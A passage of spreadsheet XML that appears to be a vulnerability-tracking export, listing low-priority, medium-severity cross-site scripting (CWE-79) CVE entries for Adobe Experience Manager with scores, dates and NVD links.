          <t>adobe:experience_manager</t>
        </is>
      </c>
      <c r="I1989" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J1989" s="5" t="inlineStr"/>
      <c r="K1989" s="5" t="inlineStr">
        <is>
          <t>CWE-79</t>
        </is>
      </c>
      <c r="L198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89" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-75711</t>
        </is>
      </c>
    </row>
    <row r="1990">
      <c r="A1990" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B1990" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-75712</t>
        </is>
      </c>
      <c r="C1990" s="5" t="n">
        <v>5.4</v>
      </c>
      <c r="D1990" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E1990" s="5" t="inlineStr"/>
      <c r="F1990" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G1990" s="5" t="inlineStr">
        <is>
          <t>java</t>
        </is>
      </c>
      <c r="H1990" s="5" t="inlineStr">
        <is>
          <t>adobe:experience_manager</t>
        </is>
      </c>
      <c r="I1990" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J1990" s="5" t="inlineStr"/>
      <c r="K1990" s="5" t="inlineStr">
        <is>
          <t>CWE-79</t>
        </is>
      </c>
      <c r="L199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90" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-75712</t>
        </is>
      </c>
    </row>
    <row r="1991">
      <c r="A1991" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B1991" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-75713</t>
        </is>
      </c>
      <c r="C1991" s="5" t="n">
        <v>5.4</v>
      </c>
      <c r="D1991" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E1991" s="5" t="inlineStr"/>
      <c r="F1991" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G1991" s="5" t="inlineStr">
        <is>
          <t>java</t>
        </is>
      </c>
      <c r="H1991" s="5" t="inlineStr">
        <is>
          <t>adobe:experience_manager</t>
        </is>
      </c>
      <c r="I1991" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J1991" s="5" t="inlineStr"/>
      <c r="K1991" s="5" t="inlineStr">
        <is>
          <t>CWE-79</t>
        </is>
      </c>
      <c r="L199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91" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-75713</t>
        </is>
      </c>
    </row>
    <row r="1992">
      <c r="A1992" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B1992" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-75714</t>
        </is>
      </c>
      <c r="C1992" s="5" t="n">
        <v>5.4</v>
      </c>
      <c r="D1992" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E1992" s="5" t="inlineStr"/>
      <c r="F1992" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G1992" s="5" t="inlineStr">
        <is>
          <t>java</t>
        </is>
      </c>
      <c r="H1992" s="5" t="inlineStr">
        <is>
          <t>adobe:experience_manager</t>
        </is>
      </c>
      <c r="I1992" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J1992" s="5" t="inlineStr"/>
      <c r="K1992" s="5" t="inlineStr">
        <is>
          <t>CWE-79</t>
        </is>
      </c>
      <c r="L199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92" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-75714</t>
        </is>
      </c>
    </row>
    <row r="1993">
      <c r="A1993" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B1993" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-75715</t>
        </is>
      </c>
      <c r="C1993" s="5" t="n">
        <v>5.4</v>
      </c>
      <c r="D1993" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E1993" s="5" t="inlineStr"/>
      <c r="F1993" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G1993" s="5" t="inlineStr">
        <is>
          <t>java</t>
        </is>
      </c>
      <c r="H1993" s="5" t="inlineStr">
        <is>
          <t>adobe:experience_manager</t>
        </is>
      </c>
      <c r="I1993" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J1993" s="5" t="inlineStr"/>
      <c r="K1993" s="5" t="inlineStr">
        <is>
          <t>CWE-79</t>
        </is>
      </c>
      <c r="L199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93" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-75715</t>
        </is>
      </c>
    </row>
    <row r="1994">
      <c r="A1994" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B1994" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-75716</t>
        </is>
      </c>
      <c r="C1994" s="5" t="n">
        <v>5.4</v>
      </c>
      <c r="D1994" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E1994" s="5" t="inlineStr"/>
      <c r="F1994" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G1994" s="5" t="inlineStr">
        <is>
          <t>java</t>
        </is>
      </c>
      <c r="H1994" s="5" t="inlineStr">
        <is>
          <t>adobe:experience_manager</t>
        </is>
      </c>
      <c r="I1994" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J1994" s="5" t="inlineStr"/>
      <c r="K1994" s="5" t="inlineStr">
        <is>
          <t>CWE-79</t>
        </is>
      </c>
      <c r="L199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94" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-75716</t>
        </is>
      </c>
    </row>
    <row r="1995">
      <c r="A1995" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B1995" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-75717</t>
        </is>
      </c>
      <c r="C1995" s="5" t="n">
        <v>5.4</v>
      </c>
      <c r="D1995" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E1995" s="5" t="inlineStr"/>
      <c r="F1995" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G1995" s="5" t="inlineStr">
        <is>
          <t>java</t>
        </is>
      </c>
      <c r="H1995" s="5" t="inlineStr">
        <is>
          <t>adobe:experience_manager</t>
        </is>
      </c>
      <c r="I1995" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J1995" s="5" t="inlineStr"/>
      <c r="K1995" s="5" t="inlineStr">
        <is>
          <t>CWE-79</t>
        </is>
      </c>
      <c r="L199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95" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-75717</t>
        </is>
      </c>
    </row>
    <row r="1996">
      <c r="A1996" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B1996" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-75718</t>
        </is>
      </c>
      <c r="C1996" s="5" t="n">
        <v>5.4</v>
      </c>
      <c r="D1996" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E1996" s="5" t="inlineStr"/>
      <c r="F1996" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G1996" s="5" t="inlineStr">
        <is>
          <t>java</t>
        </is>
      </c>
      <c r="H1996" s="5" t="inlineStr">
        <is>
          <t>adobe:experience_manager</t>
        </is>
      </c>
      <c r="I1996" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J1996" s="5" t="inlineStr"/>
      <c r="K1996" s="5" t="inlineStr">
        <is>
          <t>CWE-79</t>
        </is>
      </c>
      <c r="L199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96" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-75718</t>
        </is>
      </c>
    </row>
    <row r="1997">
      <c r="A1997" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B1997" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-75719</t>
        </is>
      </c>
      <c r="C1997" s="5" t="n">
        <v>5.4</v>
      </c>
      <c r="D1997" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E1997" s="5" t="inlineStr"/>
      <c r="F1997" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G1997" s="5" t="inlineStr">
        <is>
          <t>java</t>
        </is>
      </c>
      <c r="H1997" s="5" t="inlineStr">
        <is>
          <t>adobe:experience_manager</t>
        </is>
      </c>
      <c r="I1997" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J1997" s="5" t="inlineStr"/>
      <c r="K1997" s="5" t="inlineStr">
        <is>
          <t>CWE-79</t>
        </is>
      </c>
      <c r="L199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97" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-75719</t>
        </is>
      </c>
    </row>
    <row r="1998">
      <c r="A1998" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B1998" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-75720</t>
        </is>
      </c>
      <c r="C1998" s="5" t="n">
        <v>5.4</v>
      </c>
      <c r="D1998" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E1998" s="5" t="inlineStr"/>
      <c r="F1998" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G1998" s="5" t="inlineStr">
        <is>
          <t>java</t>
        </is>
      </c>
      <c r="H1998" s="5" t="inlineStr">
        <is>
          <t>adobe:experience_manager</t>
        </is>
      </c>
      <c r="I1998" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J1998" s="5" t="inlineStr"/>
      <c r="K1998" s="5" t="inlineStr">
        <is>
          <t>CWE-79</t>
        </is>
      </c>
      <c r="L199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98" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-75720</t>
        </is>
      </c>
    </row>
    <row r="1999">
      <c r="A1999" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B1999" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-75722</t>
        </is>
      </c>
      <c r="C1999" s="5" t="n">
        <v>5.4</v>
      </c>
      <c r="D1999" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E1999" s="5" t="inlineStr"/>
      <c r="F1999" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G1999" s="5" t="inlineStr">
        <is>
          <t>java</t>
        </is>
      </c>
      <c r="H1999" s="5" t="inlineStr">
        <is>
          <t>adobe:experience_manager</t>
        </is>
      </c>
      <c r="I1999" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J1999" s="5" t="inlineStr"/>
      <c r="K1999" s="5" t="inlineStr">
        <is>
          <t>CWE-79</t>
        </is>
      </c>
      <c r="L199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999" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-75722</t>
        </is>
      </c>
    </row>
    <row r="2000">
      <c r="A2000" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B2000" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-75724</t>
        </is>
      </c>
      <c r="C2000" s="5" t="n">
        <v>5.4</v>
      </c>
      <c r="D2000" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E2000" s="5" t="inlineStr"/>
      <c r="F2000" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G2000" s="5" t="inlineStr">
        <is>
          <t>java</t>
        </is>
      </c>
      <c r="H2000" s="5" t="inlineStr">
        <is>
          <t>adobe:experience_manager</t>
        </is>
      </c>
      <c r="I2000" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J2000" s="5" t="inlineStr"/>
      <c r="K2000" s="5" t="inlineStr">
        <is>
          <t>CWE-79</t>
        </is>
      </c>
      <c r="L200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000" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-75724</t>
        </is>
      </c>
    </row>
    <row r="2001">
      <c r="A2001" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B2001" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-75725</t>
        </is>
      </c>
      <c r="C2001" s="5" t="n">
        <v>5.4</v>
      </c>
      <c r="D2001" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E2001" s="5" t="inlineStr"/>
      <c r="F2001" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G2001" s="5" t="inlineStr">
        <is>
          <t>java</t>
        </is>
      </c>
      <c r="H2001" s="5" t="inlineStr">
        <is>
          <t>adobe:experience_manager</t>
        </is>
      </c>
      <c r="I2001" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J2001" s="5" t="inlineStr"/>
      <c r="K2001" s="5" t="inlineStr">
        <is>
          <t>CWE-79</t>
        </is>
      </c>
      <c r="L200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2001" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-75725</t>
        </is>
      </c>
    </row>
    <row r="2002">
      <c r="A2002" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B2002" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-75727</t>
        </is>
      </c>
      <c r="C2002" s="5" t="n">
        <v>5.4</v>
      </c>
      <c r="D2002" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E2002" s="5" t="inlineStr"/>
      <c r="F2002" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G2002" s="5" t="inlineStr">
        <is>
          <t>java</t>
        </is>
      </c>
      <c r="H2002" s="5" t="inlineStr">
        <is>
          <t>adobe:experience_manager</t>
        </is>
      </c>
      <c r="I2002" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J2002" s="5" t="inlineStr"/>
      <c r="K2002" s="5" t="inlineStr">
        <is>
          <t>CWE-79</t>
        </is>
      </c>
      <c r="L200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002" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-75727</t>
        </is>
      </c>
    </row>
    <row r="2003">
      <c r="A2003" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B2003" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-75729</t>
        </is>
      </c>
      <c r="C2003" s="5" t="n">
        <v>5.4</v>
      </c>
      <c r="D2003" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E2003" s="5" t="inlineStr"/>
      <c r="F2003" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G2003" s="5" t="inlineStr">
        <is>
          <t>java</t>
        </is>
      </c>
      <c r="H2003" s="5" t="inlineStr">
        <is>
          <t>adobe:experience_manager</t>
        </is>
      </c>
      <c r="I2003" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J2003" s="5" t="inlineStr"/>
      <c r="K2003" s="5" t="inlineStr">
        <is>
          <t>CWE-79</t>
        </is>
      </c>
      <c r="L200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003" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-75729</t>
        </is>
      </c>
    </row>
    <row r="2004">
      <c r="A2004" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B2004" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-75730</t>
        </is>
      </c>
      <c r="C2004" s="5" t="n">
        <v>5.4</v>
      </c>
      <c r="D2004" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E2004" s="5" t="inlineStr"/>
      <c r="F2004" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G2004" s="5" t="inlineStr">
        <is>
          <t>java</t>
        </is>
      </c>
      <c r="H2004" s="5" t="inlineStr">
        <is>
          <t>adobe:experience_manager</t>
        </is>
      </c>
      <c r="I2004" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J2004" s="5" t="inlineStr"/>
      <c r="K2004" s="5" t="inlineStr">
        <is>
          <t>CWE-79</t>
        </is>
      </c>
      <c r="L200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004" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-75730</t>
        </is>
      </c>
    </row>
    <row r="2005">
      <c r="A2005" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B2005" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-75731</t>
        </is>
      </c>
      <c r="C2005" s="5" t="n">
        <v>5.4</v>
      </c>
      <c r="D2005" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E2005" s="5" t="inlineStr"/>
      <c r="F2005" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G2005" s="5" t="inlineStr">
        <is>
          <t>java</t>
        </is>
      </c>
      <c r="H2005" s="5" t="inlineStr">
        <is>
          <t>adobe:experience_manager</t>
        </is>
      </c>
      <c r="I2005" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J2005" s="5" t="inlineStr"/>
      <c r="K2005" s="5" t="inlineStr">
        <is>
          <t>CWE-79</t>
        </is>
      </c>
      <c r="L200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005" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-75731</t>
        </is>
      </c>
    </row>
    <row r="2006">
      <c r="A2006" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B2006" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-75733</t>
        </is>
      </c>
      <c r="C2006" s="5" t="n">
        <v>5.4</v>
      </c>
      <c r="D2006" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E2006" s="5" t="inlineStr"/>
      <c r="F2006" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G2006" s="5" t="inlineStr">
        <is>
          <t>java</t>
        </is>
      </c>
      <c r="H2006" s="5" t="inlineStr">
        <is>
          <t>adobe:experience_manager</t>
        </is>
      </c>
      <c r="I2006" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J2006" s="5" t="inlineStr"/>
      <c r="K2006" s="5" t="inlineStr">
        <is>
          <t>CWE-79</t>
        </is>
      </c>
      <c r="L200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006" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-75733</t>
        </is>
      </c>
    </row>
    <row r="2007">
      <c r="A2007" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B2007" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-75734</t>
        </is>
      </c>
      <c r="C2007" s="5" t="n">
        <v>5.4</v>
      </c>
      <c r="D2007" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E2007" s="5" t="inlineStr"/>
      <c r="F2007" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G2007" s="5" t="inlineStr">
        <is>
          <t>java</t>
        </is>
      </c>
      <c r="H2007" s="5" t="inlineStr">
        <is>
          <t>adobe:experience_manager</t>
        </is>
      </c>
      <c r="I2007" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J2007" s="5" t="inlineStr"/>
      <c r="K2007" s="5" t="inlineStr">
        <is>
          <t>CWE-79</t>
        </is>
      </c>
      <c r="L200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007" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-75734</t>
        </is>
      </c>
    </row>
    <row r="2008">
      <c r="A2008" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B2008" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-75735</t>
        </is>
      </c>
      <c r="C2008" s="5" t="n">
        <v>5.4</v>
      </c>
      <c r="D2008" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E2008" s="5" t="inlineStr"/>
      <c r="F2008" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G2008" s="5" t="inlineStr">
        <is>
          <t>java</t>
        </is>
      </c>
      <c r="H2008" s="5" t="inlineStr">
        <is>
          <t>adobe:experience_manager</t>
        </is>
      </c>
      <c r="I2008" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J2008" s="5" t="inlineStr"/>
      <c r="K2008" s="5" t="inlineStr">
        <is>
          <t>CWE-79</t>
        </is>
      </c>
      <c r="L200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008" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-75735</t>
        </is>
      </c>
    </row>
    <row r="2009">
      <c r="A2009" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B2009" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-75736</t>
        </is>
      </c>
      <c r="C2009" s="5" t="n">
        <v>5.4</v>
      </c>
      <c r="D2009" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E2009" s="5" t="inlineStr"/>
      <c r="F2009" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G2009" s="5" t="inlineStr">
        <is>
          <t>java</t>
        </is>
      </c>
      <c r="H2009" s="5" t="inlineStr">
        <is>
          <t>adobe:experience_manager</t>
        </is>
      </c>
      <c r="I2009" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J2009" s="5" t="inlineStr"/>
      <c r="K2009" s="5" t="inlineStr">
        <is>
          <t>CWE-79</t>
        </is>
      </c>
      <c r="L200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009" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-75736</t>
        </is>
      </c>
    </row>
    <row r="2010">
      <c r="A2010" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B2010" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-75737</t>
        </is>
      </c>
      <c r="C2010" s="5" t="n">
        <v>5.4</v>
      </c>
      <c r="D2010" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E2010" s="5" t="inlineStr"/>
      <c r="F2010" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G2010" s="5" t="inlineStr">
        <is>
          <t>java</t>
        </is>
      </c>
      <c r="H2010" s="5" t="inlineStr">
        <is>
          <t>adobe:experience_manager</t>
        </is>
      </c>
      <c r="I2010" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J2010" s="5" t="inlineStr"/>
      <c r="K2010" s="5" t="inlineStr">
        <is>
          <t>CWE-79</t>
        </is>
      </c>
      <c r="L201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010" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-75737</t>
        </is>
      </c>
    </row>
    <row r="2011">
      <c r="A2011" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B2011" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-75738</t>
        </is>
      </c>
      <c r="C2011" s="5" t="n">
        <v>5.4</v>
      </c>
      <c r="D2011" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E2011" s="5" t="inlineStr"/>
      <c r="F2011" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G2011" s="5" t="inlineStr">
        <is>
          <t>java</t>
        </is>
      </c>
      <c r="H2011" s="5" t="inlineStr">
        <is>
          <t>adobe:experience_manager</t>
        </is>
      </c>
      <c r="I2011" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J2011" s="5" t="inlineStr"/>
      <c r="K2011" s="5" t="inlineStr">
        <is>
          <t>CWE-79</t>
        </is>
      </c>
      <c r="L201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011" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-75738</t>
        </is>
      </c>
    </row>
    <row r="2012">
      <c r="A2012" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B2012" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-75739</t>
        </is>
      </c>
      <c r="C2012" s="5" t="n">
        <v>5.4</v>
      </c>
      <c r="D2012" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E2012" s="5" t="inlineStr"/>
      <c r="F2012" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G2012" s="5" t="inlineStr">
        <is>
          <t>java</t>
        </is>
      </c>
      <c r="H2012" s="5" t="inlineStr">
        <is>
          <t>adobe:experience_manager</t>
        </is>
      </c>
      <c r="I2012" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J2012" s="5" t="inlineStr"/>
      <c r="K2012" s="5" t="inlineStr">
        <is>
          <t>CWE-79</t>
        </is>
      </c>
      <c r="L201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012" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-75739</t>
        </is>
      </c>
    </row>
    <row r="2013">
      <c r="A2013" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B2013" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-75740</t>
        </is>
      </c>
      <c r="C2013" s="5" t="n">
        <v>5.4</v>
      </c>
      <c r="D2013" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E2013" s="5" t="inlineStr"/>
      <c r="F2013" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G2013" s="5" t="inlineStr">
        <is>
          <t>java</t>
        </is>
      </c>
      <c r="H2013" s="5" t="inlineStr">
        <is>
          <t>adobe:experience_manager</t>
        </is>
      </c>
      <c r="I2013" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J2013" s="5" t="inlineStr"/>
      <c r="K2013" s="5" t="inlineStr">
        <is>
          <t>CWE-79</t>
        </is>
      </c>
      <c r="L201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013" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-75740</t>
        </is>
      </c>
    </row>
    <row r="2014">
      <c r="A2014" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B2014" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-75741</t>
        </is>
      </c>
      <c r="C2014" s="5" t="n">
        <v>5.4</v>
      </c>
      <c r="D2014" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E2014" s="5" t="inlineStr"/>
      <c r="F2014" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G2014" s="5" t="inlineStr">
        <is>
          <t>java</t>
        </is>
      </c>
      <c r="H2014" s="5" t="inlineStr">
        <is>
          <t>adobe:experience_manager</t>
        </is>
      </c>
      <c r="I2014" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J2014" s="5" t="inlineStr"/>
      <c r="K2014" s="5" t="inlineStr">
        <is>
          <t>CWE-79</t>
        </is>
      </c>
      <c r="L201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014" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-75741</t>
        </is>
      </c>
    </row>
    <row r="2015">
      <c r="A2015" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B2015" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-75742</t>
        </is>
      </c>
      <c r="C2015" s="5" t="n">
        <v>5.4</v>
      </c>
      <c r="D2015" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E2015" s="5" t="inlineStr"/>
      <c r="F2015" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G2015" s="5" t="inlineStr">
        <is>
          <t>java</t>
        </is>
      </c>
      <c r="H2015" s="5" t="inlineStr">
        <is>
          <t>adobe:experience_manager</t>
        </is>
      </c>
      <c r="I2015" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J2015" s="5" t="inlineStr"/>
      <c r="K2015" s="5" t="inlineStr">
        <is>
          <t>CWE-79</t>
        </is>
      </c>
      <c r="L201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015" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-75742</t>
        </is>
      </c>
    </row>
    <row r="2016">
      <c r="A2016" s="5" t="inlineStr">
        <is>
